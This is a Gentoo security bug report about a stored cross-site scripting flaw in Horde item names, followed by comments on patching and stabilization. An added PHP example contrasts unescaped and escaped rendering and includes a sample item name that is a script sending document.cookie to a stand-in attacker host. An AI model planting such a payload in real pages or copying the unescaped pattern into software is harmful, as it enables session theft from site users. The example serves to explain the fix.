
Bug 228507

Summary: www-apps/horde < 3.1.8 <3.2.1 script insertion
Product: Gentoo Security
Reporter: Matthias Geerdsen (RETIRED) <vorlon>
Component: Vulnerabilities
Assignee: Gentoo Security <security>
Status: RESOLVED FIXED
Severity: minor
CC: rbu, web-apps
Priority: High
Version: unspecified
Hardware: All
OS: Linux
URL: http://secunia.com/advisories/30697/
Whiteboard: B4 [noglsa]
Package list:
Runtime testing required: ---

Description Matthias Geerdsen (RETIRED) gentoo-dev 2008-06-20 11:25:52 UTC
Secunia:

1) Input passed to item names is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious data is viewed.

Successful exploitation requires valid user credentials.

The vulnerability is reported in Horde versions prior to 3.1.8 and 3.2.1, Horde Groupware versions prior to 1.1.1, and Horde Groupware Webmail Edition versions prior to 1.1.1.
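The flaw the advisory describes is a stored XSS: an authenticated user saves an item whose name carries markup, and the object browser later writes that name into the page verbatim, so it runs in the browser of whoever views the listing. The CHANGES entries cited below name the fix as escaping item names at output. The script here is an added example, not Horde's code or anything from this bug: it renders a constructed item list the vulnerable way and the escaped way, then checks each result for a raw <script> tag. Function names, the listing markup and the sample items are all hypothetical.

```php
<?php
// Added example, not Horde's code. A minimal "object browser" listing that
// renders user-supplied item names, first unescaped (the pattern the advisory
// describes), then with HTML output encoding (the pattern the fix describes).

// Constructed sample data: item names as an authenticated user could have
// saved them. The second one carries a script payload; the third shows that
// ordinary names with &, quotes and angle brackets must still display intact.
function sample_items(): array
{
    return [
        ['id' => 1, 'name' => 'Quarterly report'],
        ['id' => 2, 'name' => '<script>document.location="http://attacker.example/?c="+document.cookie</script>'],
        ['id' => 3, 'name' => 'Tom & Jerry "final" <draft>'],
    ];
}

// Vulnerable pattern: the stored name goes into the markup as-is. Whatever the
// attacker saved as a name becomes part of the page for every viewer.
function render_items_unescaped(array $items): string
{
    $html = "<ul>\n";
    foreach ($items as $item) {
        $html .= sprintf("<li><a href=\"browse.php?id=%d\">%s</a></li>\n",
                         $item['id'], $item['name']);
    }
    return $html . "</ul>\n";
}

// Hardened pattern: encode for the HTML context at the point of output, not
// when the name is stored, so the original name stays usable elsewhere.
// ENT_QUOTES also encodes single quotes, which keeps the helper safe inside
// quoted attributes; the explicit charset avoids encoding-dependent bypasses;
// ENT_SUBSTITUTE replaces invalid byte sequences instead of returning ''.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_items_escaped(array $items): string
{
    $html = "<ul>\n";
    foreach ($items as $item) {
        $html .= sprintf("<li><a href=\"browse.php?id=%d\">%s</a></li>\n",
                         (int) $item['id'], h($item['name']));
    }
    return $html . "</ul>\n";
}

// Check used below: does the rendered listing still contain a raw <script> tag?
// After escaping, the payload survives only as the text "&lt;script&gt;...".
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$items  = sample_items();
$unsafe = render_items_unescaped($items);
$safe   = render_items_escaped($items);

echo "unescaped listing contains raw <script>: "
   . var_export(contains_raw_script($unsafe), true) . "\n";   // true
echo "escaped listing contains raw <script>:   "
   . var_export(contains_raw_script($safe), true) . "\n";     // false
echo $safe;
```

The encoder above is correct for names placed in HTML text and in double-quoted attribute values; a name written into a JavaScript string or a URL parameter needs that context's encoder instead. Note that the advisory's precondition, valid user credentials, is exactly what makes this a stored rather than reflected issue: the attacker only needs to be able to name an item, and the payload fires for every later viewer.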
Comment 1 Matthias Geerdsen (RETIRED) gentoo-dev 2008-06-20 12:00:02 UTC
security relevant changes for 3.1.8
http://cvs.horde.org/diff.php/horde/docs/CHANGES?r1=1.515.2.312.2.5&r2=1.515.2.312.2.10&ty=h

[cjh] SECURITY: Escape item names in the object browser (Bug #6906).

security relevant changes for 3.2.1
http://cvs.horde.org/diff.php/horde/docs/CHANGES?r1=1.515.2.392&r2=1.515.2.413&ty=h

[cjh] SECURITY: Escape item names in the object browser (Bug #6906).
Comment 2 Gunnar Wrobel (RETIRED) gentoo-dev 2008-06-24 10:58:04 UTC
3.1.8 and 3.2.1 are in the tree. 3.2 was unstable on all arches and has been removed.

Target archs for 3.1.8:

  alpha amd64 hppa ppc sparc x86

Comment 3 Christian Faulhammer (RETIRED) gentoo-dev 2008-06-24 21:52:45 UTC
x86 stable
Comment 4 Raúl Porcel (RETIRED) gentoo-dev 2008-06-26 11:02:17 UTC
alpha/sparc stable
Comment 5 Tobias Scherbaum (RETIRED) gentoo-dev 2008-06-26 20:37:46 UTC
ppc stable
Comment 6 Jeroen Roovers (RETIRED) gentoo-dev 2008-06-28 15:26:38 UTC
Stable for HPPA.
Comment 7 Markus Meier gentoo-dev 2008-07-06 19:20:11 UTC
amd64 stable, sorry for the delay.
Comment 8 Pierre-Yves Rofes (RETIRED) gentoo-dev 2008-07-06 20:01:25 UTC
time for glsa decision... XSS => I vote NO.
Comment 9 Tobias Heinlein (RETIRED) gentoo-dev 2008-07-15 10:38:42 UTC
NO too.
Comment 10 Gunnar Wrobel (RETIRED) gentoo-dev 2008-08-01 04:46:00 UTC
*** Bug 233334 has been marked as a duplicate of this bug. ***